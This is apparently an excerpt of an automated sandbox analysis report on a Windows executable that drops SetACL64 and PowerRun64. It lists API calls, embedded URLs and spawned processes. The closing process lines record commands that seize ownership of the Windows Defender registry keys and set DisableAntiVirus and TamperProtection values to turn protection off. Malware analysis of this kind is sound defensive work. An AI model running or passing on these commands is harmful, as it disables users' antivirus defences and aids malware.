Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Code function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, | 0_2_00405C40 |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Code function: 0_2_00406891 FindFirstFileW,FindClose, | 0_2_00406891 |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Code function: 0_2_00402910 FindFirstFileW, | 0_2_00402910 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, | 4_2_00007FF69708C76C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 4_2_00007FF6970596D0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 4_2_00007FF69706CF15 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, | 5_2_00007FF69708C76C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 5_2_00007FF6970596D0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 5_2_00007FF69706CF15 |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0 |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0 |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02 |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0 |
Source: 3Dut8dFCwD.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0C |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0O |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306 |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606 |
Source: PowerRun64.exe.0.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0 |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: http://www.digicert.com/CPS0 |
Source: SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com |
Source: SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com. |
Source: SetACL64.exe, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr | String found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe |
Source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.dr | String found in binary or memory: https://www.digicert.com/CPS0 |
Source: PowerRun64.exe.0.dr | String found in binary or memory: https://www.globalsign.com/repository/0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69708B74C | 4_2_00007FF69708B74C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69706E4B0 | 4_2_00007FF69706E4B0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF6970794BC | 4_2_00007FF6970794BC |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69705A350 | 4_2_00007FF69705A350 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF6970313F0 | 4_2_00007FF6970313F0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69705BC40 | 4_2_00007FF69705BC40 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697066B2A | 4_2_00007FF697066B2A |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69708C76C | 4_2_00007FF69708C76C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69703F650 | 4_2_00007FF69703F650 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69708669C | 4_2_00007FF69708669C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697089718 | 4_2_00007FF697089718 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697047580 | 4_2_00007FF697047580 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69706A630 | 4_2_00007FF69706A630 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69705E530 | 4_2_00007FF69705E530 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697068360 | 4_2_00007FF697068360 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69707F394 | 4_2_00007FF69707F394 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF6970463E0 | 4_2_00007FF6970463E0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697083410 | 4_2_00007FF697083410 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69706C250 | 4_2_00007FF69706C250 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69707C28F | 4_2_00007FF69707C28F |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69708A31C | 4_2_00007FF69708A31C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697084218 | 4_2_00007FF697084218 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69708EF6C | 4_2_00007FF69708EF6C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69708DFF0 | 4_2_00007FF69708DFF0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69707BFE8 | 4_2_00007FF69707BFE8 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69707EF30 | 4_2_00007FF69707EF30 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697093C64 | 4_2_00007FF697093C64 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697057B10 | 4_2_00007FF697057B10 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69707FB00 | 4_2_00007FF69707FB00 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69703CB20 | 4_2_00007FF69703CB20 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69703E9D0 | 4_2_00007FF69703E9D0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69706F9C0 | 4_2_00007FF69706F9C0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF69707EA10 | 4_2_00007FF69707EA10 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697031A30 | 4_2_00007FF697031A30 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69708B74C | 5_2_00007FF69708B74C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69706E4B0 | 5_2_00007FF69706E4B0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF6970794BC | 5_2_00007FF6970794BC |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69705A350 | 5_2_00007FF69705A350 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF6970313F0 | 5_2_00007FF6970313F0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69707C28F | 5_2_00007FF69707C28F |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69705BC40 | 5_2_00007FF69705BC40 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697066B2A | 5_2_00007FF697066B2A |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69708C76C | 5_2_00007FF69708C76C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69703F650 | 5_2_00007FF69703F650 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69708669C | 5_2_00007FF69708669C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697089718 | 5_2_00007FF697089718 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697047580 | 5_2_00007FF697047580 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69706A630 | 5_2_00007FF69706A630 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69705E530 | 5_2_00007FF69705E530 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697068360 | 5_2_00007FF697068360 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69707F394 | 5_2_00007FF69707F394 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF6970463E0 | 5_2_00007FF6970463E0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697083410 | 5_2_00007FF697083410 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69706C250 | 5_2_00007FF69706C250 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69708A31C | 5_2_00007FF69708A31C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697084218 | 5_2_00007FF697084218 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69708EF6C | 5_2_00007FF69708EF6C |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69708DFF0 | 5_2_00007FF69708DFF0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69707BFE8 | 5_2_00007FF69707BFE8 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69707EF30 | 5_2_00007FF69707EF30 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697093C64 | 5_2_00007FF697093C64 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697057B10 | 5_2_00007FF697057B10 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69707FB00 | 5_2_00007FF69707FB00 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69703CB20 | 5_2_00007FF69703CB20 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69703E9D0 | 5_2_00007FF69703E9D0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69706F9C0 | 5_2_00007FF69706F9C0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF69707EA10 | 5_2_00007FF69707EA10 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697031A30 | 5_2_00007FF697031A30 |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Code function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, | 0_2_0040350F |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697053FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle, | 4_2_00007FF697053FD8 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697053D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError, | 4_2_00007FF697053D1B |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF697053A5E AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError, | 4_2_00007FF697053A5E |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 4_2_00007FF6970442A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 4_2_00007FF6970442A0 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697053FD8 AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle, | 5_2_00007FF697053FD8 |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697053D1B AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError, | 5_2_00007FF697053D1B |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF697053A5E AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,GetLastError,CloseHandle,GetCurrentProcess,OpenProcessToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError, | 5_2_00007FF697053A5E |
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe | Code function: 5_2_00007FF6970442A0 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLastError,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 5_2_00007FF6970442A0 |
Source: unknown | Process created: C:\Users\user\Desktop\3Dut8dFCwD.exe "C:\Users\user\Desktop\3Dut8dFCwD.exe" | |
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.bat | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f | |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f | |
